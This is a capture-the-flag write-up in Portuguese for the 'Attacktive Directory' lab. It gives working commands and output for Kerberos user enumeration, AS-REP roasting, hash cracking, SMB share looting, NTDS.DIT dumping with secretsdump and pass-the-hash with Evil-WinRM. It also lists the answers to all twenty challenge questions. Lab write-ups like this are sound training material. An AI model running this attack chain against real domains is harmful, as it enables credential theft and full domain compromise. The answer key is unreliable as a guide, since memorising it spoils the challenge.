🪟Attacktive Directory

Olá, viajante! Neste artigo, trago um write-up do desafio Attacktive Directory.

Contexto

Temos o seguinte alvo: um Controlador de Domínio (DC) com o endereço IP 10.10.209.6. O desafio em si também já nos fornece o domínio.

Tipo: Controlador de Domínio (DC)

IP: 10.10.209.6

Domínio: spookysec.local

Reconhecimento

Para começarmos o reconhecimento, podemos coletar diversas informações através da ferramenta Enum4linux.

enum4linux 10.10.209.6

[...] 
Domain Name: THM-AD
Domain Sid: S-1-5-21-3591857110-2884097990-301047963
[...]

1. What tool will allow us to enumerate port 139/445? [enum4linux]

2. What is the NetBIOS-Domain Name of the machine? [THM-AD]

3. What invalid TLD do people commonly use for their Active Directory Domain? [.LOCAL]

Enumeração de usuários

Para a próxima tarefa, devemos realizar a enumeração de usuários do domínio através da ferramenta Kerbrute (que compõe o conjunto de classes python Impacket), utilizando os dicionários de usuários e senhas providos pelo próprio desafio.

Através da flag -h, você pode ver as opções válidas e necessárias para descobrir os usuários.

/kerbrute -h

Executando a enumeração de usuários:

./kerbrute userenum --dc 10.10.209.6 -d spookysec.local /usr/share/wordlists/attacktive-directory/userlist.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 01/08/23 - Ronnie Flathers @ropnop

2023/01/08 18:26:19 >  Using KDC(s):
2023/01/08 18:26:19 >   10.10.209.6:88

2023/01/08 18:26:20 >  [+] VALID USERNAME:       james@spookysec.local
2023/01/08 18:26:26 >  [+] VALID USERNAME:       svc-admin@spookysec.local
2023/01/08 18:26:39 >  [+] VALID USERNAME:       James@spookysec.local
2023/01/08 18:26:43 >  [+] VALID USERNAME:       robin@spookysec.local
2023/01/08 18:27:31 >  [+] VALID USERNAME:       darkstar@spookysec.local
2023/01/08 18:27:59 >  [+] VALID USERNAME:       administrator@spookysec.local
2023/01/08 18:29:23 >  [+] VALID USERNAME:       backup@spookysec.local
2023/01/08 18:30:03 >  [+] VALID USERNAME:       paradox@spookysec.local
2023/01/08 18:33:50 >  [+] VALID USERNAME:       JAMES@spookysec.local
2023/01/08 18:34:59 >  [+] VALID USERNAME:       Robin@spookysec.local
2023/01/08 18:43:09 >  [+] VALID USERNAME:       Administrator@spookysec.local

4. What command within Kerbrute will allow us to enumerate valid usernames? [userenum]

5. What notable account is discovered? [svc-admin]

6. What is the other notable account is discovered? [backup]

Exploração

Agora que já possuímos vários usuários válidos no domínio, podemos utilizar um ataque de força-bruta. Nesse caso, utilizaremos um ataque chamado ASREPRoasting.

Um ataque ASREPRoasting ocorre quando uma conta de usuário tem o privilégio "Does not require Pre-Authentication" definido. Isso significa que a conta não precisa fornecer uma identificação válida antes de solicitar um ticket Kerberos para a conta de usuário em questão.

Para esse tipo de ataque, utilizaremos outra classe do conjunto Impacket, chamado GetNPUsers, que nos permitirá saber as contas suscetíveis a ASREPRoasting presentes no KDC (Key Distribution Center). O único requisito para consultar as contas é um conjunto válido de usuários (que já enumeramos via Kerbrute).

python /opt/impacket/examples/GetNPUsers.py -no-pass -usersfile users2.txt -dc-ip 10.10.209.6 spookysec.local/

Impacket v0.10.1.dev1+20221214.172823.8799a1a2 - Copyright 2022 Fortra

[-] User darkstar doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User backup doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User james doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User paradox doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:50822f1bbf7182827b71ddbcc8e8067a$81909570e086df06568c0ae7658e6bd2dd3e934c652adfd058f58b457e97a5767f78197a9c6fa1ac403df49eeeabd3582f3e007b2695b3c8829f3b02ee33e4f812768d19c710eb7ce550a15529a8e7b726ed4a6edc6583bb3093a94a7b553cc60e80b36c2954b37448682baf36227f2df69b133d854e29f1d025c27902971e95de3cc56335adc6d03ae14e2a031a98d5743d345226a46e52a78376da35609862b6d06f2d45cbfc9ceda36ae973e72c4de033b3e59301f4b5f3980acecc174281e4d0dc2d965b75ef06910057443d1e26111ad1b485a32555a1029d5521cfa0f3baddb8b386e1d445c2b472eb5ca5bbd3a3db

7. We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password? [svc-admin]

Descobrimos um usuário válido e suscetível a ASREPRoasting. Agora, para quebrar a hash utilizando o dicionário de senhas que salvamos previamente, precisamos descobrir qual o tipo de hash que acabamos de encontrar. Para isso, podemos consultar na lista de hashes do Hashcat.

Como existem muitos tipos de hashes Kerberos 5 na lista do Hashcat, devemos analisar minuciosamente o formato da hash para descobrirmos qual modo utilizar em sua quebra.

Tipo de hash identificado via GetNPUsers.py

8. Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? [Kerberos 5 AS-REP etype 23]

9. What mode is the hash? [18200]

Agora podemos tentar quebrar a hash utilizando o Hashcat.

hashcat -m 18200 hash.txt /usr/share/wordlists/attacktive-directory/passwordlist.txt

$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:b6fa4c0ae56445ebc248205fe51a2258$399c4cadfb39280a56b80003cdfbf7cf8f73c667cc5fbabad698611853c9d0726ec290a23395c04a343df7a57ab99c36e02f972792b688d9787830a82e7f1505a545484c5c50289142a98449293f26bacc1a57dd691a8eb6c555bc9ccb5b2ef33b23da91128b51e26b1445555991b6d1dc0de7e732e6eed3658ef3c238272e9586f60aa36e58719e23228f205b800091ba9670f5ccb57d3d823143b334529ee1d75ab8946e585612df55b37bd7b94392e4efa64a1dacbac3e23c95862ca7981eaf4b6516b25526b63f93ae1930cf1c0c9aa49c975abff82557186018006edeaa5b7addd211a2c8e09f6a6a6bcf4ec4471f3c:management2005

10. Now crack the hash with the modified password list provided, what is the user accounts password? [management2005]

Temos uma credencial válida. Utilizando essa credencial, precisamos agora enumerar os shares do servidor, utilizando a clássica ferramenta SMBClient.

11. What utility can we use to map remote SMB shares? [smbclient]

Executando a seguinte linha de comando, podemos listar os shares ativos:

smbclient -L \\\\10.10.209.6 -U spookysec.local/svc-admin

Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
backup          Disk      
C$              Disk      Default share
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share 
SYSVOL          Disk      Logon server share

12. Which option will list shares? [-L]

13. How many remote shares is the server listing? [6]

14. There is one particular share that we have access to that contains a text file. Which share is it? [backup]

Acessando o share backup com as credenciais que encontramos, conseguimos descobrir um arquivo.

smb: \> ls
  .                                   D        0  Sat Apr  4 15:08:39 2020
  ..                                  D        0  Sat Apr  4 15:08:39 2020
  backup_credentials.txt              A       48  Sat Apr  4 15:08:53 2020

                8247551 blocks of size 4096. 3687835 blocks available
smb: \> get backup_credentials.txt
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)

$ cat backup_credentials.txt 
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

15. What is the content of the file? [YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw]

O conteúdo do arquivo parece ser um Base64. Decodificando via linha de comando no Linux, obtivemos o seguinte resultado:

$ cat backup_credentials.txt | base64 -d
backup@spookysec.local:backup2517860

16. Decoding the contents of the file, what is the full contents? [backup@spookysec.local:backup2517860]

Escalação de Privilégio

Agora que já possuímos acesso ao servidor, podemos tentar elevar nosso privilégio. Pra isso, utilizaremos a ferramenta secretsdump.py, também compondo o conjunto Impacket. Se conseguirmos coletar hashes, podemos tentar elevar privilégios utilizando o método Pass the Hash.

python /opt/impacket/examples/secretsdump.py spookysec.local/backup:backup2517860@10.10.209.6

[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:1ced74bb19b4fd8a6e0bf41ad102b86f:::

17. What method allowed us to dump NTDS.DIT? [DRSUAPI]

18. What is the Administrators NTLM hash? [0e0363213e37b94221497260b0bcb4fc]

19. What method of attack could allow us to authenticate as the user without the password? [Pass the Hash]

A vigésima flag aparentemente nos indica a utilizar a ferramenta Evil-WinRM, que se aproveita justamente da falha Pass the Hash.

evil-winrm -i 10.10.209.6 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc

20. Using a tool called Evil-WinRM what option will allow us to use a hash? [-H]

Para cumprir a última parte do desafio, precisamos apenas coletar os arquivos de texto presentes na pasta Desktop de cada usuário indicado. Você consegue fazer isso sozinho. :)